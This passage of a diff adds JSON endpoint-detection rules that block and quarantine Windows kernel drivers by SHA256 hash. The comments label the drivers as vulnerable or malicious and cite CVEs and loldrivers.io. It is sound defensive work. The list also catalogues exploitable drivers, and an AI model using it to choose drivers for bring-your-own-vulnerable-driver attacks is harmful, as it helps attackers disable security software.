+ "last_update": "2026-03-23T11:45:29.971420Z",
+ "creation_date": "2026-03-23T11:45:29.971423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971432Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7e091e0d478c34232e8479b950c5513077b3a69309885cee4c61063e5f74ac0",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "367dc82b-21c3-5e4e-b24f-1bbd038cbf06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605862Z",
+ "creation_date": "2026-03-23T11:45:29.605864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "075de997497262a9d105afeadaaefc6348b25ce0e0126505c24aa9396c251e85",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "367e7cb4-9b85-5854-9490-a53bb940b951",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481888Z",
+ "creation_date": "2026-03-23T11:45:31.481893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481903Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ad5fba2066e4e72925c362a751f591965523b1727d79c6c21505cf82d049bd7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "368c2920-b654-547d-8baa-157aee9e2d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972457Z",
+ "creation_date": "2026-03-23T11:45:29.972459Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4182c6f1f9c5601b66dfe8f64d4e4e943eeeb3345ad4b5e23e3ad3b328af7eed",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3690d9fc-699a-52ae-b0e6-054ac8af5088",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154709Z",
+ "creation_date": "2026-03-23T11:45:31.154710Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154716Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2eb541f77203a949a851d733f019ed837e7a88c38c5aacbc227ff6f7c5d1af62",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "369359be-bb2c-5213-bffe-707b1d620087",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616312Z",
+ "creation_date": "2026-03-23T11:45:29.616314Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616319Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26ba58c9af9c8a7aebf222f491f786daa0626be44d34f170fea3623d92828e63",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3693ae0e-5b61-5e3f-8f86-c8411d84a5c4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144484Z",
+ "creation_date": "2026-03-23T11:45:32.144486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144492Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdd16a94a71644a8bb52c4e0fbfecb93f04cfe37bd91bac599cf9abfb822762f",
+ "comment": "Malicious Kernel Driver (aka driver_fdd16a94.sys) [https://www.loldrivers.io/drivers/da066835-f37c-40bf-86bb-d77ad45c7f30/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3695d524-a409-597d-b98d-54ab7a6eb1a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490315Z",
+ "creation_date": "2026-03-23T11:45:31.490317Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c21a832cbda14a54ff07a81d486ce37eacd3a8d041000d22fb0d929cdbef591",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "369b4b39-a9be-5a72-899a-9c634525f92b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142167Z",
+ "creation_date": "2026-03-23T11:45:31.142169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b418e2604e8cf433ce9e6b80096ca64aa009393938ecec46d9482b18b2a5929a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36a92de4-93aa-5ffa-9123-fb41f95f089c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478859Z",
+ "creation_date": "2026-03-23T11:45:30.478863Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478931Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bea8c6728d57d4b075f372ac82b8134ac8044fe13f533696a58e8864fa3efee3",
+ "comment": "Vulnerable Kernel Driver (aka rtcoremini64.sys) [https://www.loldrivers.io/drivers/b9e01a11-6395-4837-a202-0c777d717a43/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36bc48e4-23ad-5c24-8c02-b6c60a233afa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150941Z",
+ "creation_date": "2026-03-23T11:45:31.150943Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18ea074a9f9f960b7a4c2229212d2ada88fd617078fd976bd6c2d7c93b21c9db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36ce12e8-ea2a-5534-9a87-b0a775767179",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825012Z",
+ "creation_date": "2026-03-23T11:45:30.825016Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825024Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a2f4063726beaee7aab5e288c678dc70aea2696306a324e0d554b6e0a145b4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36e52b6e-8328-53cc-b48e-123c75c609dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967604Z",
+ "creation_date": "2026-03-23T11:45:29.967606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f08ebddc11aefcb46082c239f8d97ceea247d846e22c4bcdd72af75c1cbc6b0b",
+ "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "36e92001-e69c-55c7-8498-bc38ba0c992c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142148Z", + "creation_date": "2026-03-23T11:45:31.142150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab21cd0feaa710e46f1cc7dfa86a803fb001a561dd68b139018eeab2b3b25cd8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3707775e-d6c7-5e75-bfdb-184d07a0a6a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455080Z", + "creation_date": "2026-03-23T11:45:30.455083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455092Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24ea733bae1b8722841fb4c6cead93c4c4f0b1248ca9a21601b1ce6b95b06864", + "comment": "Vulnerable Kernel Driver (aka 
Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "370a6b67-0ac3-57c4-b8d0-d9bb57689976", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619541Z", + "creation_date": "2026-03-23T11:45:29.619543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c628cda1ef43defc00af45b79949675a8422490d32b080b3a8bb9434242bdbf2", + "comment": "Insyde Software dangerous update tool (aka segwindrvx64.sys) [https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Program%3AWin32%2FVulnInsydeDriver.A&threatid=258247] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "370e9dad-4f64-529e-a071-9ea11e76cb1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.480174Z", + "creation_date": "2026-03-23T11:45:31.480178Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480187Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "292428ea5c9a276d51c59c63ab0b58b78736bc0e53fc195a959f51b110742dc9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "372b3d73-4409-5794-9830-79459e843f7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620999Z", + "creation_date": "2026-03-23T11:45:29.621001Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621006Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4db1e0fdc9e6cefeb1d588668ea6161a977c372d841e7b87098cf90aa679abfb", + "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37325ccb-1daf-5bae-b21f-310e53290bb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970071Z", + "creation_date": "2026-03-23T11:45:29.970073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "62b89fab85cf77b1e6730d2b55b4f9458f368f89d3ca5672d450e3c3365d8c37", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "373884c0-fbb0-5934-b3ef-d21ef26bb689", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983281Z", + "creation_date": "2026-03-23T11:45:29.983283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7bacb353363cc29f7f3815a9d01e85cd86202d92378d1ab1b11df1ab2f42f40a", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "373c04ad-70d8-57b0-b541-133c3d0c3a32", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820540Z", + "creation_date": "2026-03-23T11:45:31.820544Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ba82355d4238272001bbe1173a2217224093e048f37b0c1838e81cd0128a737c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "374559fe-5988-5068-8252-1cc2bb02339a", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.622054Z", + "creation_date": "2026-03-23T11:45:29.622055Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.622061Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed302ea33feb557b879f64c4b7835947a9ca31054573e1487f5bbc38449753ff", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "37782778-bde9-50c7-923e-0bf8b182f9c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975769Z", + "creation_date": "2026-03-23T11:45:29.975771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975776Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "14ec631a3cff171b86e2b0279c8db436cb88ec705c517bd82a964e2c59def92f", + "comment": "Novell XTier vulnerable driver (aka libnicm.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "377af8d5-feee-558c-b96c-6e2e78deaa06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142987Z", + "creation_date": "2026-03-23T11:45:32.142989Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142995Z", + "rule_level": null, + "rule_level_override": 